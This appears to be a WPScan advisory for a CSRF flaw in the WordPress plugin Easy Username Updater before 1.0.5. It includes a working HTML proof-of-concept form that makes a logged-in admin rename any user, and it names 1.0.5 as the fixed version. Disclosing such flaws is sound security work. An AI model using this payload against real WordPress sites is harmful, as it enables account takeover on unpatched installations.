How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

Easy Username Updater < 1.0.5 - Arbitrary Username Update via CSRF

Description

The plugin does not implement CSRF checks, which could allow attackers to make a logged in admin change any user's username includes the admin

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=eup_username_update&update=3" method="POST">
      <input type="hidden" name="user&#95;login" value="newusername" />
      <input type="hidden" name="submit" value="Update&#32;Username" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

username-updater

Fixed in version 1.0.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Raad Haddad of Cloudyrion GmbH

Submitter

Raad Haddad of Cloudyrion GmbH

Submitter twitter

Verified

Yes

WPVDB ID

426b5a0f-c16d-429a-9396-b3aea7922826

Timeline

Publicly Published

2022-07-18 (about 2 months ago)

Added

2022-07-18 (about 2 months ago)

Last Updated

2022-08-22 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin